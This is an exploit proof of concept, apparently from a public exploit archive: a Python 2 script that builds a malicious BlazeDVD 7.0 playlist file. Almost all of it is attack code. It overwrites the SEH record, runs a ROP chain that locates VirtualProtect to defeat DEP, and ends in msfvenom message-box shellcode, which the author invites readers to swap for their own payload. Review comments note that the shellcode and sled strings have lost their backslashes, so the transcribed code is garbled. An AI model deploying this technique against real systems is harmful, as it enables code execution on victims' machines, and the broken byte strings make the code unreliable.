## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic

# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'

## Change shellcode according to your needs
## Shellcode max size is around 700 bytes.

# bad chars:
# \x00, \x0a, \x0b, \x1a

import struct

# Output file. NOTE(review): the str + struct.pack() concatenation below only
# works under Python 2, where struct.pack returns str; Python 3 raises TypeError.
bfile = open('bfile.plf','w')

# File layout, front to back: filler -> esp-adjust gadget -> filler -> second
# esp-adjust gadget -> filler -> SEH record (nSEH, handler) -> ROP chain ->
# NOP sled -> shellcode -> trailer. Every struct.pack() value is a hard-coded
# absolute address, so the chain is tied to the exact module builds of the
# 7.0.0.0 install named in the header. The written file is mostly 'A'/'E'
# filler around a few dozen fixed little-endian 4-byte values.
buf = 'A'*84
buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret
buf += 'AAAA' # consumed by the 'ret 04' of the SEH handler gadget
buf += 'AAAA'*3 # skipped by the 'add esp, 0c' above (12 bytes)
buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret
buf += 'A'*500
buf += 'BBBB' # nseh
buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04

#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'
# esp lands here.
# ROP chain, part 1: derive the VirtualProtect address at run time from a
# kernel32 pointer read off the stack (per the author's gadget notes below).
#setting up the dynamic pointer for virtual protect
buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
# now eax has the kernel32.dll pointer
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
buf += struct.pack('<L', 0x61640e32) # pop eax ret
buf += 'XXXX' # ret 4 padding
buf += struct.pack('<L', 0xffff675d) # neg to 98a3
buf += struct.pack('<L', 0x603267d4) # neg eax; ret
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret
buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
buf += 'XXXX' # pop esi padding
buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
# now eax has the pointer to VirtualProtect
#------------------------------------------------------------------------

# ROP chain, part 2: load each register with the value PUSHAD will lay out as
# the VirtualProtect call frame, then PUSHAD (presumably the DEP bypass the
# title refers to).
# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4
# SETTING EBP
buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('<L', 0x60349b63) # jmp esp
# SETTING EBX
buf += struct.pack('<L', 0x61629938) # pop eax; ret
buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
buf += struct.pack('<L', 0x61640124) # xchg eax,ebx
# SETTING EDX
buf += struct.pack('<L', 0x616310e8) # pop eax; ret
buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx
# SETTING ECX
buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
buf += struct.pack('<L', 0x1001524e) # writable location
# SETTING EDI
buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
buf += struct.pack('<L', 0x6162e802) # retn (rop nop)
# SETTING EAX
buf += struct.pack('<L', 0x6162d638) # pop eax; retn
buf += struct.pack('<L', 0x90909090) # nop
# FINALLY PUSHAD
buf += struct.pack('<L', 0x6033cd4a) # push ad

# Intended as a NOP sled. NOTE(review): as transcribed here the escape
# sequences have lost their backslashes, so this literal (and the shellcode
# and second sled below) is ASCII text such as 'x90', not the bytes the
# comments describe.
buf += 'x90x90x90x90'*4

# Payload: the message box described in the header (pop-up with text 'emalp').
# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
# -b 'x00x0ax0bx1a'
buf += (
"xbbx42xa8xb5x43xdaxc7xd9x74x24xf4x5ax33xc9xb1"
"x41x83xc2x04x31x5ax0fx03x5ax4dx4ax40x9axbax11"
"x72x69x18xd2xb4x40xd2x6dx86xadx76x19x99x1dxfd"
"x6bx56xd5x77x88xedxafx7fx3bx8fx0fxf4x0dx48x1f"
"x12x07x5bxc6x23x36x64x18x43x33xf7xffxa7xc8x4d"
"x3cx2cx9ax65x44x33xc9xfdxfex2bx86x58xdfx4ax73"
"xbfx2bx05x08x74xdfx94xe0x44x20xa7x3cx5ax72x43"
"x7cxd7x8cx8axb2x15x92xcbxa6xd2xafxafx1cx33xa5"
"xaexd6x19x61x31x02xfbxe2x3dx9fx8fxafx21x1ex7b"
"xc4x5dxabx7ax33xd4xefx58xdfx87x2cx12xd7x6ex67"
"xdax0dxf9x45xb5x43xb7x47xaax0exafxc7xcdx50xd0"
"x71x74xabx95xfcxafx51x9ax87x4cxb2x0ex60xe2x45"
"x51x8fx72xfcxa5x18xe9x93x95x99x99x58xe7x37x3e"
"xf7x72x3bxdbx75x4cx60xabx26x88x9cx25x30x86x5f"
"x60xb9xafx62xdbx7ax07xc0x91xc0xd0x19x0ex6bx36"
"x7exb1x74x39xe9x22xf3x9dxcaxd4x62x7ax6ex67x0d"
"xc9x15x14xbexe0x0ex52x1cx26xbbxeax7ex4excbxb4"
"xa0xaex43x20xccxcfxffx9bxc7x87x4cxf8xd2x1exad"
"x31x0fx72x7dx63xfdx8dx51xb2xc1x21xadxe0xc9"
)
# Trailing sled (same transcription caveat as above).
buf += 'x90x90x90x90'*5

# Trailer filler.
buf += 'E'*200

# The file is opened in text mode ('w'); on Windows that translates any 0x0a
# byte on write, which is presumably why 0x0a appears in the header's bad-char
# list.
bfile.write(buf)
bfile.close()